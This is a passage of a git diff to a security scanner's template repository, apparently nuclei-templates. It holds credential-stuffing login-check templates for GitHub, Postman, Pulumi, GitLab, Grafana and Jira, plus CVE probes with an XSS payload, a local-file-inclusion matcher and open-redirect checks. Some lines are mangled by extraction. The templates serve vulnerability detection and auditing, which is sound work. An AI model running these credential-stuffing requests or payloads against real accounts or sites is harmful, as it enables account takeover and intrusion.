Origin: https://github.com - Content-Type: application/x-www-form-urlencoded - Referer: https://github.com/login - - commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}} - - cookie-reuse: true - extractors: - - type: xpath - name: authenticity_token - part: body - attribute: value - internal: true - xpath: - - /html/body/div[3]/main/div/div[4]/form/input[1] - - - type: xpath - name: timestamp - part: body - attribute: value - internal: true - xpath: - - /html/body/div[3]/main/div/div[4]/form/div/input[10] - - - - type: xpath - name: timestamp_secret - part: body - attribute: value - internal: true - xpath: - - /html/body/div[3]/main/div/div[4]/form/div/input[11] - - - type: dsl - dsl: - - username - - password - - matchers-condition: or - matchers: - - type: dsl - name: 2fa - dsl: - - "contains(location, 'https://github.com/sessions/two-factor')" - - "status_code==302" - condition: and - - - type: dsl - dsl: - - "contains(to_lower(header), 'set-cookie: logged_in=yes')" - - "contains(to_lower(header), 'set-cookie: user_session=')" - - "status_code==302" - condition: and \ No newline at end of file + +self-contained: true + +http: + - raw: + - | + GET https://github.com/login HTTP/1.1 + Host: github.com + - | + POST https://github.com/session HTTP/1.1 + Host: github.com + Origin: https://github.com + Content-Type: application/x-www-form-urlencoded + Referer: https://github.com/login + + commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}} + + cookie-reuse: true + + extractors: + - type: xpath + name: authenticity_token + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/input[1] + + - type: xpath + name: timestamp + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/div/input[10] + + - type: xpath + name: timestamp_secret + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/div/input[11] + + - type: dsl + dsl: + - username + - password + + matchers-condition: or + matchers: + - type: dsl + name: 2fa + dsl: + - "contains(location, 'https://github.com/sessions/two-factor')" + - "status_code==302" + condition: and + + - type: dsl + dsl: + - "contains(to_lower(header), 'set-cookie: logged_in=yes')" + - "contains(to_lower(header), 'set-cookie: user_session=')" + - "status_code==302" + condition: and + +# digest: 4a0a00473045022100caf3b792604c5803eb1a62a931eaf88c28637c6eaa20b436a2e15da82661a8c7022075eb4d9e54c9e2d7afd17425c7be46e6062640b02c508067bd9a0f5c67d0471a:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/postman-login-check.yaml b/http/credential-stuffing/cloud/postman-login-check.yaml index 87ab5ccf18..c363f50d42 100644 --- a/http/credential-stuffing/cloud/postman-login-check.yaml +++ b/http/credential-stuffing/cloud/postman-login-check.yaml @@ -1,5 +1,5 @@ -id: postman-login-check - +id: postman-login-check + info: name: Postman Login Check author: parthmalhotra,pdresearch @@ -10,43 +10,47 @@ info: metadata: max-request: 2 tags: login-check,postman,creds-stuffing -self-contained: true -http: - - raw: - - | - GET https://identity.getpostman.com/login HTTP/1.1 - Host: identity.getpostman.com - Referer: https://identity.getpostman.com/accounts - - - | - POST https://identity.getpostman.com/login HTTP/1.1 - Host: identity.getpostman.com - Content-Type: application/json;charset=UTF-8 - X-Csrf-Token: {{csrfToken}} - Origin: https://identity.getpostman.com - Referer: https://identity.getpostman.com/login - - {"username":"{{username}}","password":"{{password}}"} - - cookie-reuse: true - attack: pitchfork - extractors: - - type: xpath - name: csrfToken - part: body - attribute: value - internal: true - xpath: - - /html/body/div/div/div[1]/form/input - - type: dsl - dsl: - - username - - password - - matchers: - - type: dsl - dsl: - - "contains(to_lower(header), 'set-cookie: getpostmanlogin=yes')" - - "contains(to_lower(body), 'identity.postman.co/continue')" - - "status_code==200" - condition: and \ No newline at end of file + +self-contained: true + +http: + - raw: + - | + GET https://identity.getpostman.com/login HTTP/1.1 + Host: identity.getpostman.com + Referer: https://identity.getpostman.com/accounts + - | + POST https://identity.getpostman.com/login HTTP/1.1 + Host: identity.getpostman.com + Content-Type: application/json;charset=UTF-8 + X-Csrf-Token: {{csrfToken}} + Origin: https://identity.getpostman.com + Referer: https://identity.getpostman.com/login + + {"username":"{{username}}","password":"{{password}}"} + + cookie-reuse: true + attack: pitchfork + + extractors: + - type: xpath + name: csrfToken + part: body + attribute: value + internal: true + xpath: + - /html/body/div/div/div[1]/form/input + + - type: dsl + dsl: + - username + - password + matchers: + - type: dsl + dsl: + - "contains(to_lower(header), 'set-cookie: getpostmanlogin=yes')" + - "contains(to_lower(body), 'identity.postman.co/continue')" + - "status_code==200" + condition: and + +# digest: 4a0a0047304502207c63308a22f0b649843e5b2578306bca9e421dcb84047df749ebb73d31be74f9022100af39ab20604291aaeaf66ae92a87f6d02f67f7a5c8ed3f93086292cc450f70de:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/pulmi-login-check.yaml b/http/credential-stuffing/cloud/pulmi-login-check.yaml index 69f8611985..368a63678f 100644 --- a/http/credential-stuffing/cloud/pulmi-login-check.yaml +++ b/http/credential-stuffing/cloud/pulmi-login-check.yaml @@ -1,5 +1,5 @@ -id: pulmi-login-check - +id: pulmi-login-check + info: name: pulmi.com Login Check author: parthmalhotra,pdresearch @@ -10,32 +10,36 @@ info: metadata: max-request: 1 tags: login-check,pulmi,creds-stuffing -self-contained: true -http: - - raw: - - | - POST https://api.pulumi.com/api/console/email/login HTTP/1.1 - Host: api.pulumi.com - Content-Type: application/json - Origin: https://app.pulumi.com - Referer: https://app.pulumi.com/ - - {"emailOrLogin":"{{username}}","password":"{{password}}"} - - extractors: - - type: dsl - dsl: - - username - - password - - matchers-condition: and - matchers: - - type: word - part: body - words: - - pulumiAccessToken - - userInfo - - - type: status - status: - - 200 \ No newline at end of file + +self-contained: true + +http: + - raw: + - | + POST https://api.pulumi.com/api/console/email/login HTTP/1.1 + Host: api.pulumi.com + Content-Type: application/json + Origin: https://app.pulumi.com + Referer: https://app.pulumi.com/ + + {"emailOrLogin":"{{username}}","password":"{{password}}"} + + extractors: + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - pulumiAccessToken + - userInfo + + - type: status + status: + - 200 + +# digest: 4a0a00473045022011c5b53e17a07d03ca3a153652beaeb23e34cdec3d7711249df48099f7f8cc2d022100852eea0b6dfeab6856b80db652c19cec92db98cbd4aada8388136ac45a9afd5b:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml index d51c10a5d8..7c7dc8a283 100644 --- a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml +++ b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml @@ -1,17 +1,17 @@ id: gitlab-login-check-self-hosted + info: name: Gitlab Login Check Self Hosted author: parthmalhotra,pdresearch severity: critical - description: Checks for a valid login on self hosted Grafana instance. + description: Checks for a valid login on self hosted GitLab instance. reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: - fofa-query: product="GitLab" max-request: 2 shodan-query: product:"GitLab Self-Managed" + fofa-query: product="GitLab" tags: login-check,gitlab,creds-stuffing,self-hosted - variables: username: "{{username}}" password: "{{password}}" @@ -21,7 +21,6 @@ http: - | GET /users/sign_in HTTP/1.1 Host: {{Hostname}} - - | POST /users/sign_in HTTP/1.1 Host: {{Hostname}} @@ -50,7 +49,6 @@ http: dsl: - username - password - req-condition: true matchers: - type: dsl @@ -58,3 +56,5 @@ http: - status_code_2 == 302 - '!contains(to_lower(body_2), "invalid login")' condition: and + +# digest: 490a00463044022041dacdb164f02b5b989914f749efbcf87a05d3e106a160fa06bbddec9300448302206031c6f1f15f8670ae0617e447ebf8c4a47f30b3bd6982a46ff0081b6b62e3d0:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/self-hosted/grafana-login-check.yaml b/http/credential-stuffing/self-hosted/grafana-login-check.yaml index 74dfcd3bdb..af3016bbb2 100644 --- a/http/credential-stuffing/self-hosted/grafana-login-check.yaml +++ b/http/credential-stuffing/self-hosted/grafana-login-check.yaml @@ -8,11 +8,10 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: - fofa-query: title="Grafana" max-request: 1 shodan-query: title:"Grafana" - tags: login-check,grafana,creds-stuffing,self-hosted - + fofa-query: title="Grafana" + tags: login-check,grafana,creds-stuffing,self-hosted variables: username: "{{username}}" password: "{{password}}" @@ -52,3 +51,5 @@ http: - type: status status: - 200 + +# digest: 4a0a0047304502207fa6c2d6cce086e723ac4fbf51dae2962116ee41bba7e62675dbc198c086354e022100c32ffecff72430025fa4c185f2d10781096541768e3c843e9e1c8e1d17022be6:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/self-hosted/jira-login-check.yaml b/http/credential-stuffing/self-hosted/jira-login-check.yaml index 7bc8059549..d3d14b37e6 100644 --- a/http/credential-stuffing/self-hosted/jira-login-check.yaml +++ b/http/credential-stuffing/self-hosted/jira-login-check.yaml @@ -8,11 +8,10 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: - fofa-query: product="JIRA" max-request: 1 shodan-query: http.component:"Atlassian Jira" + fofa-query: product="JIRA" tags: login-check,jira,creds-stuffing,self-hosted - variables: username: "{{username}}" password: "{{password}}" @@ -33,8 +32,8 @@ http: dsl: - username - password - attack: pitchfork + matchers-condition: and matchers: - type: word @@ -44,4 +43,6 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 4a0a0047304502201b101496c1854e349bf95753e7cdfb3343d8599dc26efb543e4c3ceb2bb95e1f0221008648d8f4932d84b324ff6a350ea792a0ef1ef91a393292f43082173ccbb99a54:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 81fcfed417..5b34cae11f 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -3,20 +3,26 @@ id: CVE-2000-0114 info: name: Microsoft FrontPage Extensions Check (shtml.dll) author: r3naissance - severity: low + severity: medium description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. + remediation: Upgrade to the latest version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - https://www.exploit-db.com/exploits/19897 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-2000-0114 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2000-0114 cwe-id: NVD-CWE-Other - cvss-score: 5.0 - remediation: Upgrade to the latest version. - tags: cve,cve2000,frontpage,microsoft,edb + epss-score: 0.09258 + epss-percentile: 0.94009 + cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microsoft + product: internet_information_server + tags: cve,cve2000,frontpage,microsoft,edb http: - method: GET @@ -25,13 +31,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - "_vti_bin/shtml.dll" -# Enhanced by mp on 2022/01/27 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100ef61ca1533e038591defca31601413e69136a99bbf7b14d0bbc201bef9fb683a022100f2aed7f039abdf11ff92092ee2fb677909fc16099477db3ff353ea24cc387d39:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 37b2b32615..d6560d6910 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -3,21 +3,29 @@ id: CVE-2001-0537 info: name: Cisco IOS HTTP Configuration - Authentication Bypass author: DhiyaneshDK - severity: medium + severity: critical description: | HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. + remediation: | + Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software. reference: - - https://web.archive.org/web/20030720224553/https://www.securityfocus.com/bid/2936 - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/ - https://nvd.nist.gov/vuln/detail/CVE-2001-0537 + - http://www.ciac.org/ciac/bulletins/l-106.shtml + - https://exchange.xforce.ibmcloud.com/vulnerabilities/6749 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C + cvss-score: 9.3 cve-id: CVE-2001-0537 cwe-id: CWE-287 - cvss-score: 5.0 + epss-score: 0.88063 + epss-percentile: 0.98325 + cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: cisco + product: ios shodan-query: product:"Cisco IOS http config" && 200 tags: cve,cve2001,cisco,ios,auth-bypass @@ -39,3 +47,5 @@ http: - type: status status: - 200 + +# digest: 490a0046304402202538390ca31fa8d50672fe1ec8ca650ae5c05843e04c7231f3723bab00c84716022003a6448082170c2bbc6f16aeb840421fb4c1bfbd26cb07f7ae0dd0bd6c28e23e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 0e1d8f6703..e2fcdee999 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -3,24 +3,29 @@ id: CVE-2002-1131 info: name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting author: dhiyaneshDk - severity: medium + severity: high description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + remediation: | + Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability. reference: - http://www.redhat.com/support/errata/RHSA-2002-204.html - http://www.debian.org/security/2002/dsa-191 - http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774 - https://www.exploit-db.com/exploits/21811 - - https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html - - http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/ - https://nvd.nist.gov/vuln/detail/CVE-2002-1131 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2002-1131 - tags: cve2002,edb,xss,squirrelmail,cve + cwe-id: CWE-80 + epss-score: 0.06018 + epss-percentile: 0.92657 + cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 + vendor: squirrelmail + product: squirrelmail + tags: cve2002,edb,xss,squirrelmail,cve http: - method: GET @@ -32,12 +37,9 @@ http: - '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' stop-at-first-match: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -48,4 +50,8 @@ http: words: - "text/html" -# Enhanced by mp on 2022/08/12 + - type: status + status: + - 200 + +# digest: 4a0a00473045022007afed105c841c39ef55ea55990e1c2cb8efda6cca81f97b25cafb679597e601022100fe4c3f25cbc3c7c833f00fb45e37565ae0e5212642f65b2e80f3870cef36a839:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index a23155b360..ed7b8eb121 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -5,19 +5,26 @@ info: author: dhiyaneshDk severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. + remediation: Upgrade to the latest version. reference: - https://www.exploit-db.com/exploits/24068 - http://security.gentoo.org/glsa/glsa-200405-16.xml - - http://web.archive.org/web/20210209233941/https://www.securityfocus.com/archive/1/361857 - remediation: Upgrade to the latest version. + - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc + - http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858 + - http://marc.info/?l=bugtraq&m=108334862800260 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2004-0519 cwe-id: NVD-CWE-Other - tags: squirrelmail,cve2004,cve,edb,xss + epss-score: 0.02285 + epss-percentile: 0.88442 + cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sgi + product: propack + tags: squirrelmail,cve2004,cve,edb,xss http: - method: GET @@ -26,10 +33,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -40,4 +43,8 @@ http: words: - "text/html" -# Enhanced by mp on 2022/01/27 + - type: status + status: + - 200 + +# digest: 490a0046304402204833193541075bfeb7dfec79f83d3a0fe0681d7640012f434848e518d294f9a102203caabad5546363a7be7113f6e2bf8e3942d7ca32d533ecf331e079e21e4fdd4c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 31000bcb59..f049c1fd4e 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -6,17 +6,25 @@ info: severity: medium description: | Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php. + remediation: | + Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities. reference: - https://www.exploit-db.com/exploits/24055 - https://nvd.nist.gov/vuln/detail/CVE-2004-1965 + - http://marc.info/?l=bugtraq&m=108301983206107&w=2 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/15966 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other + epss-score: 0.0113 + epss-percentile: 0.83067 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: openbb + product: openbb tags: cve,cve2004,redirect,xss,openbb http: @@ -29,3 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + +# digest: 4a0a00473045022068959768c399f79b6a7219aab3fe4e29592b83d8661aa5d7da4f6756421f618f022100c8d0bfb2832adfb107b5341ebe466e46bb475fb6f7aaab599792b0a96287f027:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 054a242432..48b0ad4891 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -5,33 +5,42 @@ info: author: CasperGN severity: medium description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). + remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. reference: - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - https://www.exploit-db.com/exploits/39495 - https://nvd.nist.gov/vuln/detail/CVE-2005-2428 - remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. + - http://marc.info/?l=bugtraq&m=112240869130356&w=2 + - http://securitytracker.com/id?1014584 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2005-2428 cwe-id: CWE-200 - tags: domino,edb,cve,cve2005 + epss-score: 0.01188 + epss-percentile: 0.83566 + cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ibm + product: lotus_domino + tags: domino,edb,cve,cve2005 http: - method: GET path: - "{{BaseURL}}/names.nsf/People?OpenView" + matchers-condition: and matchers: + - type: regex + name: domino-username + part: body + regex: + - '(Horde :: User Administration" @@ -39,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/18 +# digest: 490a0046304402206ecf6454711462b7dbb565d6ed7e8de1681c074fbf582c827e523e09b92acada022039ac2df97530fd69fac7454fa72323a6f8ad0c4bfa96405302cff4491bd271f0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 5a95371b7c..de2f7b9043 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter. + remediation: | + Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability. reference: - https://www.exploit-db.com/exploits/26488 - https://cxsecurity.com/issue/WLB-2005110025 @@ -14,13 +16,17 @@ info: - https://exchange.xforce.ibmcloud.com/vulnerabilities/23031 - https://nvd.nist.gov/vuln/detail/CVE-2005-3634 classification: - cvss-metrics: CVSS:2.0/(AV:N/AC:L/Au:N/C:N/I:P/A:N) - cvss-score: 5.0 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-score: 5 cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other - cpe: cpe:2.3:a:sap:sap_web_application_server:7.0:*:*:*:*:*:*:* + epss-score: 0.02843 + epss-percentile: 0.89558 + cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sap + product: sap_web_application_server shodan-query: html:"SAP Business Server Pages Team" tags: cve,cve2005,sap,redirect,business @@ -34,3 +40,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + +# digest: 4b0a00483046022100c84df2f2d6b114ed86741624367be22e8b471d244ec856a0a019459dabaf04b7022100a949b6f7927e3f36a6777db9c29bfadcfe4336f63a5ae3abb1387856b567de3b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 1907eb57e9..cbf49fd6e6 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -5,18 +5,25 @@ info: author: geeknik severity: medium description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. + remediation: | + Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor. reference: - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html - - http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/ - https://nvd.nist.gov/vuln/detail/CVE-2005-4385 + - http://www.vupen.com/english/advisories/2005/2977 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2005-4385 cwe-id: NVD-CWE-Other - tags: cofax,xss,cve,cve2005 + epss-score: 0.00294 + epss-percentile: 0.65778 + cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cofax + product: cofax + tags: cofax,xss,cve,cve2005 http: - method: GET @@ -25,12 +32,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: body words: - "'>\"" -# Enhanced by mp on 2022/08/12 + - type: status + status: + - 200 + +# digest: 4a0a0047304502207f2beb19ee23a7aa5b3d8486e2f2301ba2ffbc27c6b1d1af22eef3b501670333022100d868347522aa0bde725f2cccb99a0a85bff8c2f8fe3777d3e871aa7d9946c887:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 71296d4856..4d0f2d35a4 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -5,19 +5,26 @@ info: author: geeknik severity: medium description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. + remediation: | + Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability. reference: - - http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/ - - http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/ - http://www.vupen.com/english/advisories/2006/1292 - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/25698 + - https://security.gentoo.org/glsa/202012-09 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other - tags: cherokee,httpd,xss,cve,cve2006 + epss-score: 0.01015 + epss-percentile: 0.8209 + cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cherokee + product: cherokee_httpd + tags: cherokee,httpd,xss,cve,cve2006 http: - method: GET @@ -26,9 +33,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - "" @@ -38,4 +42,8 @@ http: words: - text/html -# Enhanced by mp on 2022/08/12 + - type: status + status: + - 200 + +# digest: 4a0a00473045022030189c599b26ae07716e9ea84b8bcba265e82dbb2aee80d4f60a2960b8622843022100c660038cb30b0f9ab12168d55de7ed1bf530c46119158a9cbe1f286014ba34e5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 8fbf37cc42..0604f0aad4 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -5,20 +5,27 @@ info: author: dhiyaneshDk severity: high description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. + remediation: | + Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/27948 - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE - http://www.squirrelmail.org/security/issue/2006-06-01 - - http://web.archive.org/web/20160915101900/http://secunia.com/advisories/20406/ - https://nvd.nist.gov/vuln/detail/CVE-2006-2842 + - ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.asc classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2006-2842 cwe-id: CWE-22 - tags: cve,cve2006,lfi,squirrelmail,edb + epss-score: 0.2925 + epss-percentile: 0.96361 + cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: squirrelmail + product: squirrelmail + tags: cve,cve2006,lfi,squirrelmail,edb http: - method: GET @@ -27,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -36,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a00473045022100ebcb2fcbe5db0034e7d68467a9d7d1179ae461fb7d7064bfff7538722b35104f02201ce688af23eea62a398771e28455da9e35b65239c80a7362f2d66a4cc578b89b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 71a0c2dca2..56755e33ae 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -5,19 +5,24 @@ info: author: geeknik severity: medium description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter. + remediation: | + Apply the latest security patches or upgrade to 